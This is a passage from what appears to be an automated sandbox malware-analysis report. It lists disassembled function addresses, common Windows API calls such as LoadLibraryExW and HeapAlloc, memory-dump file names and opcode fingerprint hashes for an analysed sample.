                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                    • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                                                                    • Instruction ID: ceaf479d55ba963fd59359756bd732a337970033ad7a6d7539e7d6e0984bede8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D012B25A1874241FA24DF63990007DA794FF55FE0F4A4279DE6C8BBD6DE7CE8128340
                                                                                                                                                                                                                                                    Function 00007FF69F3E81A0 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3E86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF69F3E3FA4,00000000,00007FF69F3E1925), ref: 00007FF69F3E86E9
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNELBASE(?,00007FF69F3E5C06,?,00007FF69F3E308E), ref: 00007FF69F3E81C2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2592636585-0
                                                                                                                                                                                                                                                    • Opcode ID: ace902ef65350b9af860533caa3ca60103021c1a22cf1c7a98076d3fe7d09f40
                                                                                                                                                                                                                                                    • Instruction ID: 5f9e5de6583faa09e43a2da04ed94b97166891d44e342a1423121a2264657337
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ace902ef65350b9af860533caa3ca60103021c1a22cf1c7a98076d3fe7d09f40
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32D0C201F2424181FFA4AB7BBA465795251DF89FC0F588038EF1C8BB46DC3CC0900B04
                                                                                                                                                                                                                                                    Function 00007FF69F3FC90C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(?,?,?,00007FF69F3EFFB0,?,?,?,00007FF69F3F161A,?,?,?,?,?,00007FF69F3F2E09), ref: 00007FF69F3FC94A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4292702814-0
                                                                                                                                                                                                                                                    • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                                                                    • Instruction ID: 252553d1956ab2490058a880320a6a5c38a52d528f7e6b5eacfca2082c60b50f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAF08201F59247C5FEB8567158117761380DF54BF0F0B07B8DC2EC92C2DE6CE641A290

                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                    Function 00007FFDFFC2D030 Relevance: 31.9, APIs: 16, Strings: 2, Instructions: 364COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2077104143.00007FFDFFC21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDFFC20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077076397.00007FFDFFC20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077184704.00007FFDFFCD5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077231574.00007FFDFFD0F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077261971.00007FFDFFD12000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ffdffc20000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                                                                                                    • String ID: FlsGetValue$LCMapStringEx
                                                                                                                                                                                                                                                    • API String ID: 1452528299-552164261
                                                                                                                                                                                                                                                    • Opcode ID: f0d041f4b4fc85b9cdf17ef866bfe8f9e5e967b850e0db7c2084dec861ba1d8c
                                                                                                                                                                                                                                                    • Instruction ID: ba24b8291cb9cb69e0bbddc941df2622b1548be7b0913d4c62044ac6bf537e1b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f0d041f4b4fc85b9cdf17ef866bfe8f9e5e967b850e0db7c2084dec861ba1d8c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75E15C66B08B5282EB549B59B8B097C23A1EF48B84F584235DD7E837DDEF3CE8458350